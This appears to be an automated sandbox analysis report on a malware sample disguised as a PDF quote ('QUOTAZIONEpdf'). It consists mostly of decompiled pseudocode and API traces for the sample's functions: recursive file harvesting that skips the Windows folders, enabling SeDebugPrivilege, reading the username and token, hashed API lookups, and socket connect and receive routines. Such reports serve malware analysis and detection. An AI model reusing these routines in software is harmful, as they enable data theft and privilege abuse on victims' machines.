4031e5 4 API calls 10354->10355 10356 411eb5 10355->10356 10357 4031e5 4 API calls 10356->10357 10358 411ed6 10357->10358 10359 405eb6 4 API calls 10358->10359 10359->10350 10360 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10360->10361 10361->10354 10361->10360 10362 405eb6 4 API calls 10361->10362 10362->10361 10364 4031e5 4 API calls 10363->10364 10365 404afd 10364->10365 10365->10345 10367 405998 4 API calls 10366->10367 10368 405ec8 10367->10368 10368->10352 9631 40f6b8 9632 41219c 14 API calls 9631->9632 9633 40f6c7 9632->9633 9634 41219c 14 API calls 9633->9634 9635 40f6d5 9634->9635 9636 41219c 14 API calls 9635->9636 9637 40f6df 9636->9637 9656 40d6bd 9657 4056bf 2 API calls 9656->9657 9658 40d6c9 9657->9658 9669 404cbf 9658->9669 9661 404cbf 8 API calls 9662 40d6f4 9661->9662 9663 404cbf 8 API calls 9662->9663 9664 40d702 9663->9664 9665 413aca 4 API calls 9664->9665 9666 40d711 9665->9666 9667 405695 2 API calls 9666->9667 9668 40d71f 9667->9668 9670 402b7c 2 API calls 9669->9670 9671 404ccd 9670->9671 9672 404ddc 9671->9672 9673 404b8f 5 API calls 9671->9673 9672->9661 9674 404ce4 9673->9674 9675 404dd4 9674->9675 9677 402b7c 2 API calls 9674->9677 9676 402bab 2 API calls 9675->9676 9676->9672 9684 404d04 9677->9684 9678 404dcc 9679 404a39 5 API calls 9678->9679 9679->9675 9680 404dc6 9682 402bab 2 API calls 9680->9682 9681 402b7c 2 API calls 9681->9684 9682->9678 9683 404b8f 5 API calls 9683->9684 9684->9678 9684->9680 9684->9681 9684->9683 9685 402bab GetProcessHeap RtlFreeHeap 9684->9685 9686 404a39 5 API calls 9684->9686 9687 405b6f 6 API calls 9684->9687 9688 404cbf 8 API calls 9684->9688 9685->9684 9686->9684 9687->9684 9688->9684 9689 40f0bf 9690 4056bf 2 API calls 9689->9690 9691 40f0c9 9690->9691 9692 40f115 9691->9692 9694 404cbf 8 API calls 9691->9694 9693 41219c 14 API calls 9692->9693 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9692

                Executed Functions

                Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                C-Code - Quality: 85%
                			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                0x00403d82
                0x00403d88
                0x00403d8c
                0x00403d8d
                0x00403d90
                0x00403ea9
                0x00403ea9
                0x00403eb9
                0x00403ebb
                0x00403ec0
                0x00403f95
                0x00403f95
                0x00000000
                0x00403f95
                0x00403ece
                0x00403edb
                0x00403edd
                0x00403ee2
                0x00403f8e
                0x00403f8f
                0x00000000
                0x00403f94
                0x00000000
                0x00403ee8
                0x00403ef8
                0x00403f0a
                0x00403f12
                0x00403f18
                0x00403f26
                0x00403f28
                0x00403f2d
                0x00000000
                0x00000000
                0x00403f33
                0x00403f76
                0x00403f7c
                0x00000000
                0x00403f83
                0x00403f36
                0x00403f3a
                0x00000000
                0x00403f40
                0x00403f0c
                0x00403f10
                0x00000000
                0x00000000
                0x00000000
                0x00403f41
                0x00403f41
                0x00403f4b
                0x00403f58
                0x00403f5c
                0x00403f88
                0x00000000
                0x00403f8d
                0x00403f60
                0x00000000
                0x00403f60
                0x00403ef8
                0x00403ee8
                0x00403da3
                0x00403da9
                0x00403ea6
                0x00403ea8
                0x00000000
                0x00403ea8
                0x00403db7
                0x00403dc4
                0x00403dc6
                0x00403dcb
                0x00403e9d
                0x00403e9e
                0x00403ea4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00403dd1
                0x00403dd1
                0x00403dd8
                0x00000000
                0x00000000
                0x00403de2
                0x00403e12
                0x00403e22
                0x00403e30
                0x00403e36
                0x00403e3f
                0x00403e44
                0x00403e47
                0x00403e4a
                0x00403e4c
                0x00000000
                0x00000000
                0x00403e63
                0x00403e65
                0x00403e6a
                0x00403e6f
                0x00403f64
                0x00403f6a
                0x00000000
                0x00403f71
                0x00000000
                0x00403e6f
                0x00403e26
                0x00403e27
                0x00403e2e
                0x00000000
                0x00000000
                0x00000000
                0x00403e2e
                0x00403dea
                0x00403df9
                0x00000000
                0x00000000
                0x00403e01
                0x00403e10
                0x00000000
                0x00000000
                0x00000000
                0x00403e75
                0x00403e7f
                0x00403e8c
                0x00403e8e
                0x00403e97
                0x00000000

                APIs
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$FirstNext
                • String ID: %s\%s$%s\*$Program Files$Windows
                • API String ID: 1690352074-2009209621
                • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                0x00406512
                0x00406514
                0x00406522
                0x00406524
                0x00406530
                0x00406534
                0x0040653f
                0x0040654e
                0x00406552
                0x0040655a
                0x0040655f
                0x0040656d
                0x00406570
                0x00406573
                0x0040657a
                0x00406589
                0x0040658d
                0x00406590
                0x00406594
                0x00000000
                0x0040659a
                0x004065a1

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                • String ID: SeDebugPrivilege
                • API String ID: 3615134276-2896544425
                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                0x00402b8c
                0x00402b92
                0x00402b96
                0x00402b9e
                0x00402ba3
                0x00402baa

                APIs
                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateProcess
                • String ID:
                • API String ID: 1357844191-0
                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                0x00406077
                0x00406082
                0x00406085

                APIs
                • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                Download Yara Rule
                APIs
                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: recv
                • String ID:
                • API String ID: 1507349165-0
                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062e4 call 4031e5 265->273 266->257 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                C-Code - Quality: 75%
                			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				void* _t41;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
									_t67 = _t41;
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}



























                0x004061c3
                0x004061cb
                0x004061cd
                0x004061d0
                0x004061de
                0x004061e0
                0x004061e5
                0x004061e9
                0x004061eb
                0x004061ed
                0x004061f2
                0x0040622a
                0x00406230
                0x00406235
                0x00406239
                0x0040623b
                0x00406244
                0x00406249
                0x00406249
                0x0040624c
                0x00406253
                0x00406256
                0x00406258
                0x00406261
                0x00406266
                0x00406266
                0x00406270
                0x00406273
                0x00406276
                0x0040627b
                0x0040627e
                0x0040628c
                0x0040628e
                0x00406290
                0x00406295
                0x0040629a
                0x0040629e
                0x004062a0
                0x004062ac
                0x004062af
                0x004062b7
                0x004062b9
                0x004062c9
                0x004062e0
                0x004062e2
                0x004062e4
                0x004062ec
                0x004062f3
                0x004062f3
                0x004062e4
                0x004062f8
                0x004062fd
                0x004062a0
                0x004062fe
                0x00406302
                0x00406307
                0x0040630c
                0x0040630d
                0x0040630f
                0x00406312
                0x00406317
                0x00406318
                0x0040631c
                0x0040631e
                0x00406321
                0x00406326
                0x00000000
                0x00406327
                0x004061f4
                0x004061ff
                0x00406208
                0x00406218
                0x0040621d
                0x00406224
                0x00406226
                0x00406228
                0x00000000
                0x00000000
                0x00000000
                0x00406228
                0x00406201
                0x00000000

                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                • _wmemset.LIBCMT ref: 00406244
                • _wmemset.LIBCMT ref: 00406261
                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: _wmemset$ErrorInformationLastToken
                • String ID: IDA$IDA
                • API String ID: 487585393-2020647798
                • Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                • Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                C-Code - Quality: 37%
                			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                0x00404e1d
                0x00404e26
                0x00404e2a
                0x00404e2f
                0x00404e37
                0x00404e3a
                0x00404e45
                0x00404e4f
                0x00404e57
                0x00404e61
                0x00404e66
                0x00404e68
                0x00404e6c
                0x00404e6e
                0x00404e7a
                0x00404e80
                0x00404e84
                0x00404e9f
                0x00404ea7
                0x00404eab
                0x00404eb1
                0x00404eb1
                0x00404eb6
                0x00404ebe
                0x00404ecb
                0x00000000
                0x00404ec0
                0x00404ec1
                0x00404ec7
                0x00404ec7
                0x00404ecd
                0x00000000
                0x00404ece
                0x00404ebe
                0x00404e87
                0x00404e90
                0x00000000
                0x00404e90
                0x00000000

                APIs
                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                • socket.WS2_32(?,?,?), ref: 00404E7A
                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: freeaddrinfogetaddrinfosocket
                • String ID:
                • API String ID: 2479546573-0
                • Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                • Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                C-Code - Quality: 74%
                			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
